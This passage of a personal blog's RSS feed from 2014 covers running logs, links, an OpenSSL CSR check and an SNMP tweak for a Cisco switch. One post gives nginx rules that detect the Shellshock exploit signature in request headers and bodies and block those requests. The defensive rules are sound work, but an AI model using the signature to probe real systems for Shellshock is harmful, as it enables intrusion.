  3726.    <description><![CDATA[<p><a href="https://blog.x-way.org/images/rfc791-form.jpg" title="Form RFC 791"><img src="https://blog.x-way.org/images/rfc791-form.jpg" width="520" height="328" alt="Form RFC 791"></a></p>
  3727. <p>(<a href="https://www.snookles.com/slf-blog/slf-blog/2014/05/19/hand-crafted-ip-packets-with-form-rfc-791/" title="Hand-crafted IP packets with Form RFC 791">via</a>)</p>
  3728. ]]></description>
  3729.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/images/rfc791-form.jpg" title="Form RFC 791"><img src="https://blog.x-way.org/images/rfc791-form.jpg" width="520" height="328" alt="Form RFC 791"></a></p>
  3730. <p>(<a href="https://www.snookles.com/slf-blog/slf-blog/2014/05/19/hand-crafted-ip-packets-with-form-rfc-791/" title="Hand-crafted IP packets with Form RFC 791">via</a>)</p>
  3731. ]]></content:encoded>
  3732.  </item>
  3733.  
  3734.  <item>
  3735.    <title>Christmas Run</title>
  3736.    <link>https://blog.x-way.org/Misc/2014/12/25/Christmas-Run.html</link>
  3737.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324246</guid>
  3738.    <dc:creator>Andreas Jaggi</dc:creator>
  3739.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3740.    <pubDate>Thu, 25 Dec 2014 12:16:00 +0000</pubDate>
  3741.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3742.    <description><![CDATA[<p>Run #9 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Two rounds again, this time during noon with some nice sun and a whopping 30°C :-)</p>
  3743. <p><a href="https://www.strava.com/activities/232605707" title="Centennial Midday Run 2x | Strava">Centennial Midday Run 2x</a></p>
  3744. ]]></description>
  3745.    <content:encoded><![CDATA[<p>Run #9 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Two rounds again, this time during noon with some nice sun and a whopping 30°C :-)</p>
  3746. <p><a href="https://www.strava.com/activities/232605707" title="Centennial Midday Run 2x | Strava">Centennial Midday Run 2x</a></p>
  3747. ]]></content:encoded>
  3748.  </item>
  3749.  
  3750.  <item>
  3751.    <title>Advent Run #8</title>
  3752.    <link>https://blog.x-way.org/Misc/2014/12/22/Advent-Run-8.html</link>
  3753.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324245</guid>
  3754.    <dc:creator>Andreas Jaggi</dc:creator>
  3755.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3756.    <pubDate>Mon, 22 Dec 2014 23:35:00 +0000</pubDate>
  3757.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3758.    <description><![CDATA[<p>Run #8 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Two rounds again, and with some rain :-(</p>
  3759. <p><a href="https://www.strava.com/activities/231954760" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  3760. ]]></description>
  3761.    <content:encoded><![CDATA[<p>Run #8 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Two rounds again, and with some rain :-(</p>
  3762. <p><a href="https://www.strava.com/activities/231954760" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  3763. ]]></content:encoded>
  3764.  </item>
  3765.  
  3766.  <item>
  3767.    <title>Advent Run #7</title>
  3768.    <link>https://blog.x-way.org/Misc/2014/12/19/Advent-Run-7.html</link>
  3769.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324244</guid>
  3770.    <dc:creator>Andreas Jaggi</dc:creator>
  3771.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3772.    <pubDate>Fri, 19 Dec 2014 23:21:00 +0000</pubDate>
  3773.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3774.    <description><![CDATA[<p>Run #7 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Only one round, but the fastest one so far.</p>
  3775. <p><a href="https://www.strava.com/activities/230676682" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3776. ]]></description>
  3777.    <content:encoded><![CDATA[<p>Run #7 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Only one round, but the fastest one so far.</p>
  3778. <p><a href="https://www.strava.com/activities/230676682" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3779. ]]></content:encoded>
  3780.  </item>
  3781.  
  3782.  <item>
  3783.    <title>Advent Run #6</title>
  3784.    <link>https://blog.x-way.org/Misc/2014/12/16/Advent-Run-6.html</link>
  3785.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324243</guid>
  3786.    <dc:creator>Andreas Jaggi</dc:creator>
  3787.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3788.    <pubDate>Tue, 16 Dec 2014 23:31:00 +0000</pubDate>
  3789.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3790.    <description><![CDATA[<p>Run #6 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Two rounds this time, with a slower pace though.</p>
  3791. <p><a href="https://www.strava.com/activities/229959879" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  3792. ]]></description>
  3793.    <content:encoded><![CDATA[<p>Run #6 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Two rounds this time, with a slower pace though.</p>
  3794. <p><a href="https://www.strava.com/activities/229959879" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  3795. ]]></content:encoded>
  3796.  </item>
  3797.  
  3798.  <item>
  3799.    <title>Advent Run #5</title>
  3800.    <link>https://blog.x-way.org/Misc/2014/12/12/Advent-Run-5.html</link>
  3801.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324242</guid>
  3802.    <dc:creator>Andreas Jaggi</dc:creator>
  3803.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3804.    <pubDate>Fri, 12 Dec 2014 22:51:00 +0000</pubDate>
  3805.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3806.    <description><![CDATA[<p>Run #5 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Didn't have the patience to wait for the GPS to lock onto the signal, thus the late start.</p>
  3807. <p><a href="https://www.strava.com/activities/228585950" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3808. ]]></description>
  3809.    <content:encoded><![CDATA[<p>Run #5 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>. Didn't have the patience to wait for the GPS to lock onto the signal, thus the late start.</p>
  3810. <p><a href="https://www.strava.com/activities/228585950" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3811. ]]></content:encoded>
  3812.  </item>
  3813.  
  3814.  <item>
  3815.    <title>Advent Run #4</title>
  3816.    <link>https://blog.x-way.org/Misc/2014/12/10/Advent-Run-4.html</link>
  3817.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324241</guid>
  3818.    <dc:creator>Andreas Jaggi</dc:creator>
  3819.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3820.    <pubDate>Wed, 10 Dec 2014 23:14:00 +0000</pubDate>
  3821.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3822.    <description><![CDATA[<p>Run #4 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>, this time a bit later and thus with more sun:</p>
  3823. <p><a href="https://www.strava.com/activities/227954289" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3824. ]]></description>
  3825.    <content:encoded><![CDATA[<p>Run #4 around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>, this time a bit later and thus with more sun:</p>
  3826. <p><a href="https://www.strava.com/activities/227954289" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3827. ]]></content:encoded>
  3828.  </item>
  3829.  
  3830.  <item>
  3831.    <title>Advent Run #3</title>
  3832.    <link>https://blog.x-way.org/Misc/2014/12/09/Advent-Run-3.html</link>
  3833.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324240</guid>
  3834.    <dc:creator>Andreas Jaggi</dc:creator>
  3835.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3836.    <pubDate>Tue, 09 Dec 2014 22:53:00 +0000</pubDate>
  3837.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3838.    <description><![CDATA[<p>Another run around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>, this time counterclockwise:</p>
  3839. <p><a href="https://www.strava.com/activities/227599067" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3840. ]]></description>
  3841.    <content:encoded><![CDATA[<p>Another run around <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>, this time counterclockwise:</p>
  3842. <p><a href="https://www.strava.com/activities/227599067" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3843. ]]></content:encoded>
  3844.  </item>
  3845.  
  3846.  <item>
  3847.    <title>Advent Run #2</title>
  3848.    <link>https://blog.x-way.org/Misc/2014/12/03/Advent-Run-2.html</link>
  3849.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324239</guid>
  3850.    <dc:creator>Andreas Jaggi</dc:creator>
  3851.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3852.    <pubDate>Wed, 03 Dec 2014 22:43:00 +0000</pubDate>
  3853.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3854.    <description><![CDATA[<p>Next run around the beautiful <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>:</p>
  3855. <p><a href="https://www.strava.com/activities/225939583" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3856. ]]></description>
  3857.    <content:encoded><![CDATA[<p>Next run around the beautiful <a href="http://www.centennialparklands.com.au" title="Centennial Parklands">Centennial Park</a>:</p>
  3858. <p><a href="https://www.strava.com/activities/225939583" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3859. ]]></content:encoded>
  3860.  </item>
  3861.  
  3862.  <item>
  3863.    <title>Advent Run #1</title>
  3864.    <link>https://blog.x-way.org/Misc/2014/12/01/Advent-Run-1.html</link>
  3865.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324237</guid>
  3866.    <dc:creator>Andreas Jaggi</dc:creator>
  3867.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3868.    <pubDate>Mon, 01 Dec 2014 21:34:00 +0000</pubDate>
  3869.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3870.    <description><![CDATA[<p>The nice thing of being in Sydney during December is that you can go running during christmas time and it is 22°C :-)</p>
  3871. <p><a href="https://www.strava.com/activities/225305851" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3872. ]]></description>
  3873.    <content:encoded><![CDATA[<p>The nice thing of being in Sydney during December is that you can go running during christmas time and it is 22°C :-)</p>
  3874. <p><a href="https://www.strava.com/activities/225305851" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  3875. ]]></content:encoded>
  3876.  </item>
  3877.  
  3878.  <item>
  3879.    <title>Regex Crossword</title>
  3880.    <link>https://blog.x-way.org/Coding/2014/11/30/Regex-Crossword.html</link>
  3881.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324236</guid>
  3882.    <dc:creator>Andreas Jaggi</dc:creator>
  3883.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3884.    <pubDate>Sun, 30 Nov 2014 21:55:00 +0000</pubDate>
  3885.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  3886.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/regexcrossword.png" width="520" height="351" alt="The End | Regex Crossword"></p>
  3887. <p><a href="http://regexcrossword.com" title="Regex Crossword">Regex Crossword</a> (<a href="https://news.ycombinator.com/item?id=8674039" title="Regex Crossword | Hacker News">via</a>)</p>
  3888. ]]></description>
  3889.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/regexcrossword.png" width="520" height="351" alt="The End | Regex Crossword"></p>
  3890. <p><a href="http://regexcrossword.com" title="Regex Crossword">Regex Crossword</a> (<a href="https://news.ycombinator.com/item?id=8674039" title="Regex Crossword | Hacker News">via</a>)</p>
  3891. ]]></content:encoded>
  3892.  </item>
  3893.  
  3894.  <item>
  3895.    <title>The UNIX System</title>
  3896.    <link>https://blog.x-way.org/Linux/2014/11/24/The-UNIX-System.html</link>
  3897.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324235</guid>
  3898.    <dc:creator>Andreas Jaggi</dc:creator>
  3899.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3900.    <pubDate>Mon, 24 Nov 2014 23:26:00 +0000</pubDate>
  3901.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3902.    <description><![CDATA[<p><a href="https://youtu.be/tc4ROCJYbm0" title="AT&amp;T Archives: The UNIX Operation System - YouTube">AT&amp;T Archives: The UNIX Operation System</a></p>
  3903. <p>The UNIX System: Making Computers More Productive, 1982, Bell Laboratories</p>
  3904. ]]></description>
  3905.    <content:encoded><![CDATA[<p><a href="https://youtu.be/tc4ROCJYbm0" title="AT&amp;T Archives: The UNIX Operation System - YouTube">AT&amp;T Archives: The UNIX Operation System</a></p>
  3906. <p>The UNIX System: Making Computers More Productive, 1982, Bell Laboratories</p>
  3907. ]]></content:encoded>
  3908.  </item>
  3909.  
  3910.  <item>
  3911.    <title>SixSpotting</title>
  3912.    <link>https://blog.x-way.org/Networking/2014/11/02/SixSpotting.html</link>
  3913.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324234</guid>
  3914.    <dc:creator>Andreas Jaggi</dc:creator>
  3915.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3916.    <pubDate>Sun, 02 Nov 2014 08:43:00 +0000</pubDate>
  3917.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3918.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/for-realz.jpg" width="618" height="463" alt="IPv6 - IS FOR REALZ NOWZ, SRUSLY"></p>
  3919. <p><a href="https://game.flyingpenguintech.org" title="SixSpotting">SixSpotting</a>, a funny little game where you collect points by logging in from as many IPv6 enabled providers as possible.</p>
  3920. ]]></description>
  3921.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/for-realz.jpg" width="618" height="463" alt="IPv6 - IS FOR REALZ NOWZ, SRUSLY"></p>
  3922. <p><a href="https://game.flyingpenguintech.org" title="SixSpotting">SixSpotting</a>, a funny little game where you collect points by logging in from as many IPv6 enabled providers as possible.</p>
  3923. ]]></content:encoded>
  3924.  </item>
  3925.  
  3926.  <item>
  3927.    <title>Show Shellshock the door</title>
  3928.    <link>https://blog.x-way.org/Networking/2014/10/18/Show-Shellshock-the-door.html</link>
  3929.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324233</guid>
  3930.    <dc:creator>Andreas Jaggi</dc:creator>
  3931.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3932.    <pubDate>Sat, 18 Oct 2014 18:45:00 +0000</pubDate>
  3933.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3934.    <description><![CDATA[<p>
  3935. Lately the requests trying to exploit the <a href="http://en.wikipedia.org/wiki/Shellshock_(software_bug)" title="Shellshock (software bug)">Shellshock vulnerability</a> are getting annoying.
  3936. Of course my hosts are patched &mdash; even before the first such request arrived &mdash; and they are using <a href="http://en.wikipedia.org/wiki/Debian_Almquist_shell" title="Debian Almquist shell">Dash</a> as /bin/sh anyway.<br>
  3937. But this does not stop attackers from sending those requests.
  3938. Some even seem to have programmed a loop which sends request after request even though their exploit is not working.
  3939. </p>
  3940. <p>
  3941. Since most of the requests are for valid URLs, the webserver just replies with a 200 status code and serves the content.
  3942. As this gives no indication to the attacker whether his exploit worked or not, he has no reason to remove the host from his target-list and thus continues to send requests.
  3943. </p>
  3944. <p>
  3945. To break this pattern and signal that the host is not vulnerable to Shellshock, I came up with the <a href="http://nginx.org" title="nginx">nginx</a> config snippet below.
  3946. It recognizes Shellshock patterns in a request and replies with a '403 Forbidden' status code, thus indicating to an attacker that his request was blocked.
  3947. </p>
  3948. <pre>
  3949. if ( $http_referer ~ ^\s*\(\s*\)\s*\{ ) {
  3950.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3951. }
  3952. if ( $http_user_agent ~ ^\s*\(\s*\)\s*\{ ) {
  3953.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3954. }
  3955. if ( $http_cookie ~ ^\s*\(\s*\)\s*\{ ) {
  3956.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3957. }
  3958. if ( $http_host ~ ^\s*\(\s*\)\s*\{ ) {
  3959.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3960. }
  3961. if ( $args ~ ^\s*\(\s*\)\s*\{ ) {
  3962.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3963. }
  3964. if ( $content_type ~ ^\s*\(\s*\)\s*\{ ) {
  3965.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3966. }
  3967. if ( $remote_user ~ ^\s*\(\s*\)\s*\{ ) {
  3968.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3969. }
  3970. if ( $request ~ ^\s*\(\s*\)\s*\{ ) {
  3971.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3972. }
  3973. if ( $request_body ~ ^\s*\(\s*\)\s*\{ ) {
  3974.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3975. }
  3976. </pre>
  3977. ]]></description>
  3978.    <content:encoded><![CDATA[<p>
  3979. Lately the requests trying to exploit the <a href="http://en.wikipedia.org/wiki/Shellshock_(software_bug)" title="Shellshock (software bug)">Shellshock vulnerability</a> are getting annoying.
  3980. Of course my hosts are patched &mdash; even before the first such request arrived &mdash; and they are using <a href="http://en.wikipedia.org/wiki/Debian_Almquist_shell" title="Debian Almquist shell">Dash</a> as /bin/sh anyway.<br>
  3981. But this does not stop attackers from sending those requests.
  3982. Some even seem to have programmed a loop which sends request after request even though their exploit is not working.
  3983. </p>
  3984. <p>
  3985. Since most of the requests are for valid URLs, the webserver just replies with a 200 status code and serves the content.
  3986. As this gives no indication to the attacker whether his exploit worked or not, he has no reason to remove the host from his target-list and thus continues to send requests.
  3987. </p>
  3988. <p>
  3989. To break this pattern and signal that the host is not vulnerable to Shellshock, I came up with the <a href="http://nginx.org" title="nginx">nginx</a> config snippet below.
  3990. It recognizes Shellshock patterns in a request and replies with a '403 Forbidden' status code, thus indicating to an attacker that his request was blocked.
  3991. </p>
  3992. <pre>
  3993. if ( $http_referer ~ ^\s*\(\s*\)\s*\{ ) {
  3994.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3995. }
  3996. if ( $http_user_agent ~ ^\s*\(\s*\)\s*\{ ) {
  3997.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  3998. }
  3999. if ( $http_cookie ~ ^\s*\(\s*\)\s*\{ ) {
  4000.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4001. }
  4002. if ( $http_host ~ ^\s*\(\s*\)\s*\{ ) {
  4003.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4004. }
  4005. if ( $args ~ ^\s*\(\s*\)\s*\{ ) {
  4006.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4007. }
  4008. if ( $content_type ~ ^\s*\(\s*\)\s*\{ ) {
  4009.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4010. }
  4011. if ( $remote_user ~ ^\s*\(\s*\)\s*\{ ) {
  4012.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4013. }
  4014. if ( $request ~ ^\s*\(\s*\)\s*\{ ) {
  4015.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4016. }
  4017. if ( $request_body ~ ^\s*\(\s*\)\s*\{ ) {
  4018.        return 403 "Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).";
  4019. }
  4020. </pre>
  4021. ]]></content:encoded>
  4022.  </item>
  4023.  
  4024.  <item>
  4025.    <title>Inspect CSR with OpenSSL</title>
  4026.    <link>https://blog.x-way.org/Linux/2014/10/17/Inspect-CSR-with-OpenSSL.html</link>
  4027.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324232</guid>
  4028.    <dc:creator>Andreas Jaggi</dc:creator>
  4029.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4030.    <pubDate>Fri, 17 Oct 2014 10:45:00 +0000</pubDate>
  4031.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4032.    <description><![CDATA[<p>Before sending a <abbr title="Certificate Signing Request">CSR</abbr> off to your <abbr title="Certificate Authority">CA</abbr>, it is worth checking that all parameters are correct.<br>Especially you should make sure that the requested signature algorithm is SHA256 and not the deprecated SHA1.</p>
  4033. <p>This can be done with the following OpenSSL command:</p>
  4034. <pre>openssl req -noout -text -in &lt;your_CSR_file&gt;</pre>
  4035. ]]></description>
  4036.    <content:encoded><![CDATA[<p>Before sending a <abbr title="Certificate Signing Request">CSR</abbr> off to your <abbr title="Certificate Authority">CA</abbr>, it is worth checking that all parameters are correct.<br>Especially you should make sure that the requested signature algorithm is SHA256 and not the deprecated SHA1.</p>
  4037. <p>This can be done with the following OpenSSL command:</p>
  4038. <pre>openssl req -noout -text -in &lt;your_CSR_file&gt;</pre>
  4039. ]]></content:encoded>
  4040.  </item>
  4041.  
  4042.  <item>
  4043.    <title>Blueprint of IKEA</title>
  4044.    <link>https://blog.x-way.org/Misc/2014/10/13/Blueprint-of-IKEA.html</link>
  4045.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324231</guid>
  4046.    <dc:creator>Andreas Jaggi</dc:creator>
  4047.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4048.    <pubDate>Mon, 13 Oct 2014 06:38:00 +0000</pubDate>
  4049.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  4050.    <description><![CDATA[<p>Spot-on representation of every IKEA store's layout:</p>
  4051. <p><a href="https://blog.x-way.org/images/ikea_blueprint.jpg" title="Blueprint of IKEA"><img src="https://blog.x-way.org/images/ikea_blueprint_small.jpg" alt="Blueprint of IKEA" width="540" height="255"></a></p>
  4052. ]]></description>
  4053.    <content:encoded><![CDATA[<p>Spot-on representation of every IKEA store's layout:</p>
  4054. <p><a href="https://blog.x-way.org/images/ikea_blueprint.jpg" title="Blueprint of IKEA"><img src="https://blog.x-way.org/images/ikea_blueprint_small.jpg" alt="Blueprint of IKEA" width="540" height="255"></a></p>
  4055. ]]></content:encoded>
  4056.  </item>
  4057.  
  4058.  <item>
  4059.    <title>NORWAY - A Time-Lapse Adventure</title>
  4060.    <link>https://blog.x-way.org/Misc/2014/10/05/NORWAY-A-Time-Lapse-Adventure.html</link>
  4061.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324230</guid>
  4062.    <dc:creator>Andreas Jaggi</dc:creator>
  4063.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4064.    <pubDate>Sun, 05 Oct 2014 08:38:00 +0000</pubDate>
  4065.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  4066.    <description><![CDATA[<p><a href="https://vimeo.com/200671449" title="SEASONS of NORWAY - A Time-Lapse Adventure - Vimeo">SEASONS of NORWAY - A Time-Lapse Adventure</a></p>
  4067. <p><a href="http://vimeo.com/200671449" title="SEASONS of NORWAY - A Time-Lapse Adventure">SEASONS of NORWAY - A Time-Lapse Adventure</a> from <a href="http://vimeo.com/rustadmedia" title="Rustad Media">Rustad Media</a> on <a href="https://vimeo.com" title="Vimeo">Vimeo</a>. (<a href="http://kniebes.com" title="Markus Kniebes">via</a>)</p>
  4068. ]]></description>
  4069.    <content:encoded><![CDATA[<p><a href="https://vimeo.com/200671449" title="SEASONS of NORWAY - A Time-Lapse Adventure - Vimeo">SEASONS of NORWAY - A Time-Lapse Adventure</a></p>
  4070. <p><a href="http://vimeo.com/200671449" title="SEASONS of NORWAY - A Time-Lapse Adventure">SEASONS of NORWAY - A Time-Lapse Adventure</a> from <a href="http://vimeo.com/rustadmedia" title="Rustad Media">Rustad Media</a> on <a href="https://vimeo.com" title="Vimeo">Vimeo</a>. (<a href="http://kniebes.com" title="Markus Kniebes">via</a>)</p>
  4071. ]]></content:encoded>
  4072.  </item>
  4073.  
  4074.  <item>
  4075.    <title>How to enable SNMP on a Cisco SLM2008 Smart Switch</title>
  4076.    <link>https://blog.x-way.org/Networking/2014/10/05/How-to-enable-SNMP-on-a-Cisco-SLM2008-Smart-Switch.html</link>
  4077.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324229</guid>
  4078.    <dc:creator>Andreas Jaggi</dc:creator>
  4079.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4080.    <pubDate>Sun, 05 Oct 2014 00:31:00 +0000</pubDate>
  4081.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4082.    <description><![CDATA[<p>The Cisco SMB SLM2008 Smart Switch does normally not support SNMP and there is also no setting in the configuration interface which would enable SNMP.</p>
  4083.  
  4084. <p>But nevertheless the firmware does actually contain a SNMP daemon. Thus it is not surprising that a <a href="https://supportforums.cisco.com/discussion/11015421/slm2008-vs-snmp-vs-switchcfg-editing" title="SLM2008 vs SNMP">smart guy on to the Cisco support forum</a> found out how to manipulate the proprietary config file such that it enables the SNMP daemon:</p>
  4085.  
  4086. <ol>
  4087. <li>Configure your switch with everything you need</li>
  4088. <li>Download <a href="https://blog.x-way.org/stuff/enable_snmp.pl" title="enable_snmp.pl">enable_snmp.pl</a></li>
  4089. <li>Run <code># perl enable_snmp.pl &lt;IP of your switch&gt;</code></li>
  4090. <li>Enjoy the SNMP export from the SLM2008 :-)</li>
  4091. </ol>
  4092. <p>As this is a non-official hack, there are some limitations:</p>
  4093. <ul>
  4094. <li>The embedded SNMP daemon only supports read accces and no SNMP Traps.</li>
  4095. <li>Changing a setting on the 'System' configuration tab disables the SNMP daemon again (thus the script will need to be run again).</li>
  4096. </ul>
  4097. ]]></description>
  4098.    <content:encoded><![CDATA[<p>The Cisco SMB SLM2008 Smart Switch does normally not support SNMP and there is also no setting in the configuration interface which would enable SNMP.</p>
  4099.  
  4100. <p>But nevertheless the firmware does actually contain a SNMP daemon. Thus it is not surprising that a <a href="https://supportforums.cisco.com/discussion/11015421/slm2008-vs-snmp-vs-switchcfg-editing" title="SLM2008 vs SNMP">smart guy on to the Cisco support forum</a> found out how to manipulate the proprietary config file such that it enables the SNMP daemon:</p>
  4101.  
  4102. <ol>
  4103. <li>Configure your switch with everything you need</li>
  4104. <li>Download <a href="https://blog.x-way.org/stuff/enable_snmp.pl" title="enable_snmp.pl">enable_snmp.pl</a></li>
  4105. <li>Run <code># perl enable_snmp.pl &lt;IP of your switch&gt;</code></li>
  4106. <li>Enjoy the SNMP export from the SLM2008 :-)</li>
  4107. </ol>
  4108. <p>As this is a non-official hack, there are some limitations:</p>
  4109. <ul>
  4110. <li>The embedded SNMP daemon only supports read accces and no SNMP Traps.</li>
  4111. <li>Changing a setting on the 'System' configuration tab disables the SNMP daemon again (thus the script will need to be run again).</li>
  4112. </ul>
  4113. ]]></content:encoded>
  4114.  </item>
  4115.  
  4116.  <item>
  4117.    <title>The Cyborgs</title>
  4118.    <link>https://blog.x-way.org/Music/2014/10/01/The-Cyborgs.html</link>
  4119.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324228</guid>
  4120.    <dc:creator>Andreas Jaggi</dc:creator>
  4121.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4122.    <pubDate>Wed, 01 Oct 2014 00:10:00 +0000</pubDate>
  4123.    <category domain="https://blog.x-way.org/Music">Music</category>
  4124.    <description><![CDATA[<p><a href="https://youtu.be/d8mRWV7owNM" title="The Cyborgs - Electric Chair - YouTube">The Cyborgs - Electric Chair</a></p>
  4125. <p><a href="http://www.thecyborgs.it/" title="The Cyborgs - Two Men Band">The Cyborgs</a> is a two man 'elektrock' boogie band.<br>Thank you <a href="http://sat.rocks" title="Sat Rocks">Sat Rocks</a> for showing me their music :-)</p>
  4126. ]]></description>
  4127.    <content:encoded><![CDATA[<p><a href="https://youtu.be/d8mRWV7owNM" title="The Cyborgs - Electric Chair - YouTube">The Cyborgs - Electric Chair</a></p>
